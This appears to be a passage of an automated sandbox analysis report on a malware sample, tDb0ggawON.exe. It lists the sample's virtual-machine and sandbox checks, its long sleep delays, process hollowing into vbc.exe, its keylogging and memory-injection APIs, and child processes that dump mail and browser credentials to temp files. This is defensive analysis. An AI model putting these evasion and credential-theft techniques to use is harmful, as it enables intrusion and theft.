                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.35439a8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5868Thread sleep time: -34588s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 5856Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 4736Thread sleep time: -140000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 2076Thread sleep time: -71000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exe TID: 4696Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,14_2_00408836
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeWindow / User API: threadDelayed 355Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004161B0 memset,GetSystemInfo,14_2_004161B0
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,14_2_00408441
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,14_2_00407E0E
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00406EC3
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 34588Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 120000Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 140000Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeThread delayed: delay time: 180000Jump to behavior
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: bhvED7C.tmp.14.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220214T174307Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ee30c48e4bbc4e22b328cbb579b9ae00&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1386668&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1386668&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,14_2_00408836
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004422C7
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Sample uses process hollowing technique
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                  .NET source code references suspicious native API functions
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Users\user\Desktop\tDb0ggawON.exe C:\Users\user\Desktop\tDb0ggawON.exeJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Users\user\Desktop\tDb0ggawON.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
